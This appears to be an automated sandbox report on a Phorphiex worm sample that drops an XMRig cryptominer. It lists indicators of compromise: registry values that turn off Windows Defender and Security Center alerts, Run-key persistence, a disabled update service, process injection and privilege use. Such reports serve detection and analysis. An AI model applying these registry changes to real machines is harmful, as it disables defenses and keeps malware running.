phorphiex | e0fa830fae317de959f388ef4c8ae19c38bb7ddbd9ab95ed76d56a1838e8b5c2

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	sysddnr.exe

Modifies security service 2 TTPs 3 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysblvrvcr.exe

Phorphiex family
phorphiex

Phorphiex payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b7c-2.dat	family_phorphiex
behavioral2/files/0x000e000000023a8f-9.dat	family_phorphiex
behavioral2/files/0x0007000000023c78-256.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 3404 created 3372	3404	3892412225.exe	56
PID 3404 created 3372	3404	3892412225.exe	56
PID 4240 created 3372	4240	winupsecvmgr.exe	56
PID 4240 created 3372	4240	winupsecvmgr.exe	56
PID 4240 created 3372	4240	winupsecvmgr.exe	56

Windows security bypass 2 TTPs 24 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblvrvcr.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 31 IoCs

miner

resource	yara_rule
behavioral2/memory/4240-187-0x00007FF75ECB0000-0x00007FF75F247000-memory.dmp	xmrig
behavioral2/memory/1776-190-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-192-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-194-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-196-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-198-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-200-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-203-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-205-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-207-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-224-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-226-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-228-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-230-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-232-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-234-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-237-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-239-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-241-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-243-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-245-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-247-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-250-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-264-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-297-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-299-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-301-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-303-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-308-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-310-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig
behavioral2/memory/1776-312-0x00007FF6A5100000-0x00007FF6A58EF000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3468	powershell.exe
4008	powershell.exe
3404	powershell.exe
4808	powershell.exe
2552	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	sysblvrvcr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	198133041.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	2876132126.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	sysblvrvcr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	252852848.exe

Executes dropped EXE 25 IoCs

pid	Process
4252	sysddnr.exe
3872	23441.exe
4408	sysblvrvcr.exe
2968	12514.exe
8	198133041.exe
2656	21276.exe
1064	2090427174.exe
2464	1915218797.exe
3404	3892412225.exe
5048	2285710112.exe
4240	winupsecvmgr.exe
1744	1892230035.exe
4556	sysppvrdnvs.exe
3104	2876132126.exe
60	783223494.exe
3540	12174.exe
3236	sysblvrvcr.exe
624	608015116.exe
3876	153056533.exe
2744	24716.exe
4968	33749.exe
544	252852848.exe
1844	2899026932.exe
4528	3275818656.exe
3716	36959972.exe

Windows security modification 2 TTPs 28 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblvrvcr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1"	sysddnr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysddnr.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Operating System = "C:\\Windows\\37949668\\sysddnr.exe"	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblvrvcr.exe"	23441.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	1892230035.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysblvrvcr.exe"	12174.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Operating System = "C:\\Windows\\37949668\\sysddnr.exe"	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4240 set thread context of 4800	4240	winupsecvmgr.exe	152
PID 4240 set thread context of 1776	4240	winupsecvmgr.exe	153

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\sysblvrvcr.exe	23441.exe
File opened for modification	C:\Windows\sysblvrvcr.exe	23441.exe
File created	C:\Windows\sysppvrdnvs.exe	1892230035.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	1892230035.exe
File created	C:\Windows\sysblvrvcr.exe	12174.exe
File created	C:\Windows\37949668\sysddnr.exe	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
File opened for modification	C:\Windows\37949668\sysddnr.exe	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
File opened for modification	C:\Windows\37949668	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2496	sc.exe
1968	sc.exe
4032	sc.exe
672	sc.exe
536	sc.exe
4632	sc.exe
1436	sc.exe
4772	sc.exe
2464	sc.exe
4108	sc.exe
2156	sc.exe
3552	sc.exe
3856	sc.exe
1364	sc.exe
508	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2090427174.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2285710112.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysblvrvcr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	153056533.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	24716.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36959972.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2899026932.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3275818656.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	12174.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	33749.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1892230035.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysddnr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	12514.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	21276.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	783223494.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	608015116.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysblvrvcr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	23441.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1915218797.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
4252	sysddnr.exe
3468	powershell.exe
3468	powershell.exe
8	198133041.exe
3404	3892412225.exe
3404	3892412225.exe
4808	powershell.exe
4808	powershell.exe
3404	3892412225.exe
3404	3892412225.exe
4240	winupsecvmgr.exe
4240	winupsecvmgr.exe
2552	powershell.exe
2552	powershell.exe
4240	winupsecvmgr.exe
4240	winupsecvmgr.exe
4240	winupsecvmgr.exe
4240	winupsecvmgr.exe
4008	powershell.exe
4008	powershell.exe
3104	2876132126.exe
3404	powershell.exe
3404	powershell.exe
544	252852848.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
3236	sysblvrvcr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe
Token: SeDebugPrivilege	4252	sysddnr.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	8	198133041.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe
Token: 35	4808	powershell.exe
Token: 36	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe
Token: 35	4808	powershell.exe
Token: 36	4808	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 4252	2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe	92
PID 2228 wrote to memory of 4252	2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe	92
PID 2228 wrote to memory of 4252	2228	980f4f8d01c746653b3a9b7fc41be0a66d88ac7c8d7f729eb8e123f3604f38c1.exe	92
PID 4252 wrote to memory of 3872	4252	sysddnr.exe	114
PID 4252 wrote to memory of 3872	4252	sysddnr.exe	114
PID 4252 wrote to memory of 3872	4252	sysddnr.exe	114
